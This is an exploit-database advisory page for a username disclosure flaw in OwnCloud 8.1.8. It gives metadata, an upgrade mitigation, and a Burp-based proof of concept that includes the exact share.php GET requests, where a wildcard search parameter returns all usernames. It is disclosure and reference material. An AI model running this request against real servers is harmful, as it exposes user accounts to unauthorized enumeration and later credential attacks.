OwnCloud 8.1.8 - Username Disclosure

vendor:

OwnCloud

by:

Daniel Moreno

3.3

CVSS

MEDIUM

Username Disclosure

200

CWE

Product Name: OwnCloud

Affected Version From: 8.1.8

Affected Version To: 8.1.8

Patch Exists: YES

Related CWE: N/A

CPE: a:owncloud:owncloud:8.1.8

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: CentOS

2019

OwnCloud 8.1.8 – Username Disclosure

OwnCloud 8.1.8 is vulnerable to username disclosure. An attacker can intercept the connection with Burp, share a file, typing anything and change the GET parameter to '*search=*'. This will return a JSON with all username informations.

Mitigation:

Upgrade to the latest version of OwnCloud and ensure that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: OwnCloud 8.1.8 - Username Disclosure
# Exploit Author : Daniel Moreno
# Exploit Date: 2019-11-29
# Vendor Homepage :  https://owncloud.org/  
# Link Software :  https://ftp.icm.edu.pl/packages/owncloud/  (old version. Download at your own risk) 
# Tested on OS: CentOS

# PoC:
# 1. Create an account in OwnCloud
# 2. Intercept connection with Burp
# 3. Share a file, typing anything

---------------------------------------------------------
4. Burp will capture this request

GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
requesttoken: XXXXXXXXXXXXXXXXXXX
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://domain.com/index.php/apps/files/
Cookie: XXXXXXXXXXXXXXXX
---------------------------------------------------------------------

5. Send to Repeater

6. Change GET parameter to THIS:

GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
HTTP/1.1


7. Return valeus will be a JSON with all username informations